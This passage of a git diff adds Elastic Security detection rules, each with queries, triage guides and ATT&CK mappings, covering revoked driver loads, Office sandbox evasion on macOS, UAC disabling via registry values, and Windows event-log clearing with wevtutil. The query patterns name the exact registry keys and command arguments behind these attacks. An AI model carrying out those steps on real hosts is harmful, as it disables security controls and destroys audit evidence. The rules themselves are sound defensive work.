"https://attack.mitre.org/techniques/T1003/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "d117cbb4-7d56-41b4-b999-bdf8c25648a0_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d12bac54-ab2a-4159-933f-d7bcefa7b61d_5.json b/packages/security_detection_engine/kibana/security_rule/d12bac54-ab2a-4159-933f-d7bcefa7b61d_5.json new file mode 100644 index 00000000000..39b7a69a234 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d12bac54-ab2a-4159-933f-d7bcefa7b61d_5.json @@ -0,0 +1,97 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies an attempt to load a revoked or expired driver. Adversaries may bring outdated drivers with vulnerabilities to gain code execution in kernel mode or abuse revoked certificates to sign their drivers.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.library-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Expired or Revoked Driver Loaded", + "query": "driver where host.os.type == \"windows\" and process.pid == 4 and\n dll.code_signature.status : (\"errorExpired\", \"errorRevoked\")\n", + "references": [ + "https://docs.microsoft.com/en-us/previous-versions/windows/hardware/design/dn653559(v=vs.85)?redirectedfrom=MSDN" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "dll.code_signature.status", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pid", + "type": "long" + } + ], + "risk_score": 47, + "rule_id": "d12bac54-ab2a-4159-933f-d7bcefa7b61d", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1068", + "name": "Exploitation for Privilege Escalation", + "reference": "https://attack.mitre.org/techniques/T1068/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.001", + "name": "Invalid Code Signature", + "reference": "https://attack.mitre.org/techniques/T1036/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": "d12bac54-ab2a-4159-933f-d7bcefa7b61d_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d22a85c6-d2ad-4cc4-bf7b-54787473669a_106.json b/packages/security_detection_engine/kibana/security_rule/d22a85c6-d2ad-4cc4-bf7b-54787473669a_106.json new file mode 100644 index 00000000000..55b96a4e815 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d22a85c6-d2ad-4cc4-bf7b-54787473669a_106.json @@ -0,0 +1,82 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the creation of a suspicious zip file prepended with special characters. Sandboxed Microsoft Office applications on macOS are allowed to write files that start with special characters, which can be combined with an AutoStart location to achieve sandbox evasion.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Potential Microsoft Office Sandbox Evasion", + "query": "event.category:file and host.os.type:(macos and macos) and not event.type:deletion and file.name:~$*.zip\n", + "references": [ + "https://i.blackhat.com/USA-20/Wednesday/us-20-Wardle-Office-Drama-On-macOS.pdf", + "https://www.mdsec.co.uk/2018/08/escaping-the-sandbox-microsoft-office-on-macos/", + "https://desi-jarvis.medium.com/office365-macos-sandbox-escape-fcce4fa4123c" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "d22a85c6-d2ad-4cc4-bf7b-54787473669a", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1497", + "name": "Virtualization/Sandbox Evasion", + "reference": "https://attack.mitre.org/techniques/T1497/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "d22a85c6-d2ad-4cc4-bf7b-54787473669a_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_109.json b/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_109.json new file mode 100644 index 00000000000..c45fc084be5 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_109.json @@ -0,0 +1,139 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "User Account Control (UAC) can help mitigate the impact of malware on Windows hosts. With UAC, apps and tasks always run in the security context of a non-administrator account, unless an administrator specifically authorizes administrator-level access to the system. This rule identifies registry value changes to bypass User Access Control (UAC) protection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Disabling User Account Control via Registry Modification", + "note": "## Triage and analysis\n\n### Investigating Disabling User Account Control via Registry Modification\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nAttackers may disable UAC to execute code directly in high integrity. This rule identifies registry value changes to bypass the UAC protection.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behaviors in the alert timeframe.\n- Investigate abnormal behaviors observed by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Analyze non-system processes executed with high integrity after UAC was disabled for unknown or suspicious processes.\n- Retrieve the suspicious processes' executables and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restore UAC settings to the desired state.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and event.type == \"change\" and\n registry.path :\n (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLUA\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\ConsentPromptBehaviorAdmin\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\PromptOnSecureDesktop\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLUA\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\ConsentPromptBehaviorAdmin\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\PromptOnSecureDesktop\"\n ) and\n registry.data.strings : (\"0\", \"0x00000000\")\n", + "references": [ + "https://www.greyhathacker.net/?p=796", + "https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings", + "https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-overview" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "d31f183a-e5b1-451b-8534-ba62bca0b404", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + }, + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + }, + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "d31f183a-e5b1-451b-8534-ba62bca0b404_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_110.json b/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_110.json new file mode 100644 index 00000000000..3929c84936f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d31f183a-e5b1-451b-8534-ba62bca0b404_110.json @@ -0,0 +1,139 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "User Account Control (UAC) can help mitigate the impact of malware on Windows hosts. With UAC, apps and tasks always run in the security context of a non-administrator account, unless an administrator specifically authorizes administrator-level access to the system. This rule identifies registry value changes to bypass User Access Control (UAC) protection.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.registry-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Disabling User Account Control via Registry Modification", + "note": "## Triage and analysis\n\n### Investigating Disabling User Account Control via Registry Modification\n\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as low to high integrity levels) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. UAC can deny an operation under high-integrity enforcement, or allow the user to perform the action if they are in the local administrators group and enter an administrator password when prompted.\n\nFor more information about the UAC and how it works, check the [official Microsoft docs page](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works).\n\nAttackers may disable UAC to execute code directly in high integrity. This rule identifies registry value changes to bypass the UAC protection.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Inspect the host for suspicious or abnormal behaviors in the alert timeframe.\n- Investigate abnormal behaviors observed by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Analyze non-system processes executed with high integrity after UAC was disabled for unknown or suspicious processes.\n- Retrieve the suspicious processes' executables and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restore UAC settings to the desired state.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "registry where host.os.type == \"windows\" and event.type == \"change\" and\n registry.path :\n (\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLUA\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\ConsentPromptBehaviorAdmin\",\n \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\PromptOnSecureDesktop\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLUA\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\ConsentPromptBehaviorAdmin\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\PromptOnSecureDesktop\"\n ) and\n registry.data.strings : (\"0\", \"0x00000000\")\n", + "references": [ + "https://www.greyhathacker.net/?p=796", + "https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-group-policy-and-registry-key-settings", + "https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-overview" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "d31f183a-e5b1-451b-8534-ba62bca0b404", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1548", + "name": "Abuse Elevation Control Mechanism", + "reference": "https://attack.mitre.org/techniques/T1548/", + "subtechnique": [ + { + "id": "T1548.002", + "name": "Bypass User Account Control", + "reference": "https://attack.mitre.org/techniques/T1548/002/" + } + ] + }, + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + }, + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "d31f183a-e5b1-451b-8534-ba62bca0b404_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_111.json b/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_111.json new file mode 100644 index 00000000000..8caf1833fad --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_111.json @@ -0,0 +1,109 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to clear or disable Windows event log stores using Windows wevetutil command. This is often done by attackers in an attempt to evade detection or destroy forensic evidence on a system.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Clearing Windows Event Logs", + "note": "## Triage and analysis\n\n### Investigating Clearing Windows Event Logs\n\nWindows event logs are a fundamental data source for security monitoring, forensics, and incident response. Adversaries can tamper, clear, and delete this data to break SIEM detections, cover their tracks, and slow down incident response.\n\nThis rule looks for the execution of the `wevtutil.exe` utility or the `Clear-EventLog` cmdlet to clear event logs.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - Verify if any other anti-forensics behaviors were observed.\n- Investigate the event logs prior to the action for suspicious behaviors that an attacker may be trying to cover up.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity and there are justifications for this action.\n- Analyze whether the cleared event log is pertinent to security and general monitoring. Administrators can clear non-relevant event logs using this mechanism. If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - This activity is potentially done after the adversary achieves its objectives on the host. Ensure that previous actions, if any, are investigated accordingly with their response playbooks.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n(\n (\n (process.name : \"wevtutil.exe\" or ?process.pe.original_file_name == \"wevtutil.exe\") and\n process.args : (\"/e:false\", \"cl\", \"clear-log\")\n ) or\n (\n process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and\n process.args : \"Clear-EventLog\"\n )\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "d331bbe2-6db4-4941-80a5-8270db72eb61", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/", + "subtechnique": [ + { + "id": "T1070.001", + "name": "Clear Windows Event Logs", + "reference": "https://attack.mitre.org/techniques/T1070/001/" + }, + { + "id": "T1562.002", + "name": "Disable Windows Event Logging", + "reference": "https://attack.mitre.org/techniques/T1562/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "d331bbe2-6db4-4941-80a5-8270db72eb61_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_112.json b/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_112.json new file mode 100644 index 00000000000..6a3609fd721 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/d331bbe2-6db4-4941-80a5-8270db72eb61_112.json @@ -0,0 +1,109 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to clear or disable Windows event log stores using Windows wevetutil command. This is often done by attackers in an attempt to evade detection or destroy forensic evidence on a system.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.process-*", + "logs-windows.*", + "endgame-*", + "logs-system.security*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Clearing Windows Event Logs", + "note": "## Triage and analysis\n\n### Investigating Clearing Windows Event Logs\n\nWindows event logs are a fundamental data source for security monitoring, forensics, and incident response. Adversaries can tamper, clear, and delete this data to break SIEM detections, cover their tracks, and slow down incident response.\n\nThis rule looks for the execution of the `wevtutil.exe` utility or the `Clear-EventLog` cmdlet to clear event logs.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - Verify if any other anti-forensics behaviors were observed.\n- Investigate the event logs prior to the action for suspicious behaviors that an attacker may be trying to cover up.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the administrator is aware of the activity and there are justifications for this action.\n- Analyze whether the cleared event log is pertinent to security and general monitoring. Administrators can clear non-relevant event logs using this mechanism. If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - This activity is potentially done after the adversary achieves its objectives on the host. Ensure that previous actions, if any, are investigated accordingly with their response playbooks.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n(\n (\n (process.name : \"wevtutil.exe\" or ?process.pe.original_file_name == \"wevtutil.exe\") and\n process.args : (\"/e:false\", \"cl\", \"clear-log\")\n ) or\n (\n process.name : (\"powershell.exe\", \"pwsh.exe\", \"powershell_ise.exe\") and\n process.args : \"Clear-EventLog\"\n )\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + }, + { + "package": "system", + "version": "^1.6.4" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "d331bbe2-6db4-4941-80a5-8270db72eb61", + "setup": "## Setup\n\nIf enabling an EQL rule on a 